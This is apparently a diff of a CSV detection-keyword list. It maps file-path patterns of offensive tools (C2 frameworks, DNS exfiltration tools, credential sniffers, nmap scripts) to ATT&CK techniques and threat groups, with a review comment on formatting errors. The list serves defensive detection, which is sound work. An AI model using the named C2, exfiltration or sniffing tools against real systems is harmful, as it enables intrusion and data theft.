T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - 
T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","761","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*/DllExport.bat*","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik 
Spider","C2","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" "*/DLL-Hijack*","offensive_tool_keyword","cobaltstrike","DLL Hijack Search Order Enumeration BOF","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/DLL-Hijack-Search-Order-BOF","1","1","N/A","10","10","125","21","2021-11-03T17:39:32Z","2021-11-02T03:47:31Z" "*/DllNotificationInjection.git*","offensive_tool_keyword","DllNotificationInjection","A POC of a new threadless process injection technique that works by utilizing the concept of DLL Notification Callbacks in local and remote processes.","T1055.011 - T1055.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/ShorSec/DllNotificationInjection","1","1","N/A","10","4","319","56","2023-08-23T13:50:27Z","2023-08-14T11:22:30Z" "*/DllProxy.git*","offensive_tool_keyword","DllProxy","Proxy your dll exports and add some spicy content at the same time","T1574.002 - T1036.005","TA0005 - 
TA0004","N/A","N/A","Exploitation Tools","https://github.com/Iansus/DllProxy/","1","1","N/A","N/A","1","16","5","2023-06-28T14:19:36Z","2021-05-04T19:38:42Z" "*/dlls/c2.c*","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","10","10","1004","158","2023-07-15T05:34:10Z","2020-06-30T19:24:13Z" -"*/dns_grabber.*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14623","1372","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" -"*/dns_spoof*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14623","1372","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*/dns_grabber.*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" 
+"*/dns_spoof*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" "*/dns-blacklist.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/dns-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/dns-cache-snoop.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/dnscan.git*","offensive_tool_keyword","dnscan","dnscan is a python wordlist-based DNS subdomain scanner.","T1595 - T1595.002 - T1018 - T1046","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://github.com/rbsec/dnscan","1","1","N/A","6","10","984","413","2022-08-09T11:11:31Z","2013-03-13T10:42:07Z" -"*/dnscan.py*","offensive_tool_keyword","dnscan","dnscan is a python wordlist-based DNS subdomain scanner.","T1595 - T1595.002 - T1018 - T1046","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://github.com/rbsec/dnscan","1","1","N/A","6","10","984","413","2022-08-09T11:11:31Z","2013-03-13T10:42:07Z" +"*/dnscan.git*","offensive_tool_keyword","dnscan","dnscan is a python wordlist-based DNS subdomain scanner.","T1595 - T1595.002 - T1018 - T1046","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://github.com/rbsec/dnscan","1","1","N/A","6","10","985","413","2022-08-09T11:11:31Z","2013-03-13T10:42:07Z" +"*/dnscan.py*","offensive_tool_keyword","dnscan","dnscan is a python wordlist-based DNS subdomain scanner.","T1595 - T1595.002 - T1018 - T1046","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://github.com/rbsec/dnscan","1","1","N/A","6","10","985","413","2022-08-09T11:11:31Z","2013-03-13T10:42:07Z" "*/dnscat.c*","offensive_tool_keyword","dnscat2","This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol","T1071.004 - T1102 - T1071.001","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/iagox86/dnscat2","1","1","N/A","10","10","3077","596","2023-04-26T17:40:22Z","2013-01-04T23:15:55Z" "*/dnscat2.git*","offensive_tool_keyword","dnscat2","This tool is designed to 
create an encrypted command-and-control (C&C) channel over the DNS protocol","T1071.004 - T1102 - T1071.001","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/iagox86/dnscat2","1","1","N/A","10","10","3077","596","2023-04-26T17:40:22Z","2013-01-04T23:15:55Z" "*/dns-check-zone.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/dns-client-subnet-scan.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/dnscnc.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/dnscnc.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" "*/DNSExfiltrator*","offensive_tool_keyword","DNSExfiltrator","DNSExfiltrator allows for transfering (exfiltrate) a file over a DNS request covert channel. This is basically a data leak testing tool allowing to exfiltrate data over a covert channel.","T1041 - T1048","TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/Arno0x/DNSExfiltrator","1","1","N/A","10","8","792","189","2019-10-06T22:24:55Z","2017-12-20T13:58:09Z" "*/dns-fuzz.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/dns-ip6-arpa-scan.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" 
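Review bot: The refreshed metasploit row for `*/dll/inject/*` still carries `T1204 -T1210` in metadata_tool_techniques, with no space after the hyphen, so a consumer that splits the field on ` - ` would read it as one unknown technique and drop both mappings; it should read `T1204 - T1210`. The two bettercap rows rewritten in this hunk (`*/dns_grabber.*` and `*/dns_spoof*`) also list `TA0010` twice in metadata_tool_tactics, once at the start and once at the end of the list. These rows are being rewritten for the star and fork counts anyway, so the refresh step looks like the natural place to normalise separators and de-duplicate IDs, assuming the file is produced by a script, which the diff does not show. The same `T1204 -T1210` string appears in the metasploit row just before this hunk.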
@@ -3374,17 +3383,17 @@ "*/dnsspoof.c*","offensive_tool_keyword","dsniff","password sniffer. handles FTP. Telnet. SMTP. HTTP. POP. poppass. NNTP. IMAP. SNMP. LDAP. Rlogin. RIP. OSPF. PPTP MS-CHAP. NFS. VRRP. YP/NIS. SOCKS. X11. CVS. IRC. AIM. ICQ. Napster. PostgreSQL. Meeting Maker. Citrix ICA. Symantec pcAnywhere. NAI Sniffer. Microsoft SMB. Oracle SQL*Net. Sybase and Microsoft SQL auth info. dsniff automatically detects and minimally parses each application protocol. only saving the interesting bits. and uses Berkeley DB as its output file format. only logging unique authentication attempts. full TCP/IP reassembly is provided by libnids(3) (likewise for the following tools as well).","T1110 - T1040 - T1074.001 - T1555.002 - T1555.003","TA0001 - TA0002 - TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/tecknicaltom/dsniff","1","0","N/A","N/A","2","167","44","2010-06-29T05:53:39Z","2010-06-23T13:11:11Z" "*/dns-srv-enum.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/dnsteal*","offensive_tool_keyword","dnsteal","This is a fake DNS server that allows you to stealthily extract files from a victim machine through DNS requests.","T1048.003 - T1568.002 - T1573.002","TA0010 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/m57/dnsteal","1","1","N/A","N/A","10","1378","236","2022-02-03T11:04:49Z","2015-08-11T17:02:58Z" -"*/dnstool.py*","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dirkjanm/krbrelayx","1","1","N/A","N/A","2","900","148","2023-09-07T20:11:36Z","2019-01-08T18:42:07Z" +"*/dnstool.py*","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dirkjanm/krbrelayx","1","1","N/A","N/A","10","902","148","2023-09-07T20:11:36Z","2019-01-08T18:42:07Z" "*/dns-update.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/dns-zeustracker.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/dns-zone-transfer.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/dobin/avred*","offensive_tool_keyword","avred","Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/dobin/avred","1","1","N/A","9","2","172","19","2023-09-30T12:28:42Z","2022-05-19T12:12:34Z" +"*/dobin/avred*","offensive_tool_keyword","avred","Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/dobin/avred","1","1","N/A","9","2","173","19","2023-09-30T12:28:42Z","2022-05-19T12:12:34Z" "*/docker-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/DocPlz.git*","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","1","N/A","10","1","48","6","2023-10-03T23:06:53Z","2023-10-02T20:49:22Z" -"*/DocsPLZ.cpp*","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","1","N/A","10","1","48","6","2023-10-03T23:06:53Z","2023-10-02T20:49:22Z" -"*/DocsPLZ.exe*","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","1","N/A","10","1","48","6","2023-10-03T23:06:53Z","2023-10-02T20:49:22Z" -"*/documentation-c2/*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" -"*/documentation-payload/*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" +"*/DocPlz.git*","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","1","N/A","10","1","81","13","2023-10-03T23:06:53Z","2023-10-02T20:49:22Z" +"*/DocsPLZ.cpp*","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","1","N/A","10","1","81","13","2023-10-03T23:06:53Z","2023-10-02T20:49:22Z" +"*/DocsPLZ.exe*","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","1","N/A","10","1","81","13","2023-10-03T23:06:53Z","2023-10-02T20:49:22Z" +"*/documentation-c2/*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*/documentation-payload/*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" "*/Doge-Loader/*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Loader by Golang","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/timwhitez/Doge-Loader","1","1","N/A","10","10","277","61","2021-04-22T08:24:59Z","2020-10-09T04:47:54Z" "*/DoHC2.cs*","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). 
This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","432","99","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" "*/DoHC2.git*","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","432","99","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" 
@@ -3393,23 +3402,23 @@ "*/domain_analyzer.git*","offensive_tool_keyword","domain_analyzer","Analyze the security of any domain by finding all the information possible","T1560 - T1590 - T1200 - T1213 - T1057","TA0002 - TA0009","N/A","N/A","Information Gathering","https://github.com/eldraco/domain_analyzer","1","1","N/A","6","10","1831","259","2022-12-29T10:57:33Z","2017-08-08T18:52:34Z" "*/domain_analyzer:latest*","offensive_tool_keyword","domain_analyzer","Analyze the security of any domain by finding all the information possible","T1560 - T1590 - T1200 - T1213 - T1057","TA0002 - TA0009","N/A","N/A","Information Gathering","https://github.com/eldraco/domain_analyzer","1","0","N/A","6","10","1831","259","2022-12-29T10:57:33Z","2017-08-08T18:52:34Z" "*/domainhunter*","offensive_tool_keyword","domainhunter","Checks expired domains for categorization/reputation and Archive.org history to determine good candidates for phishing and C2 domain names ","T1583.002 - T1568.002","TA0011 - TA0009","N/A","N/A","Phishing","https://github.com/threatexpress/domainhunter","1","1","N/A","N/A","10","1380","291","2022-10-26T03:15:13Z","2017-03-01T11:16:26Z" -"*/DomainRecon/*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*/DomainRecon/*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation 
Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" "*/domcon-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/domcon-cmd.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/Dome.git*","offensive_tool_keyword","DOME","DOME - A subdomain enumeration tool","T1583 - T1595 - T1190","TA0011 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/v4d1/Dome","1","1","N/A","N/A","4","375","50","2022-03-10T12:08:17Z","2022-02-20T15:09:40Z" +"*/Dome.git*","offensive_tool_keyword","DOME","DOME - A subdomain enumeration tool","T1583 - T1595 - T1190","TA0011 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/v4d1/Dome","1","1","N/A","N/A","4","376","52","2022-03-10T12:08:17Z","2022-02-20T15:09:40Z" "*/domino-enum-users.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
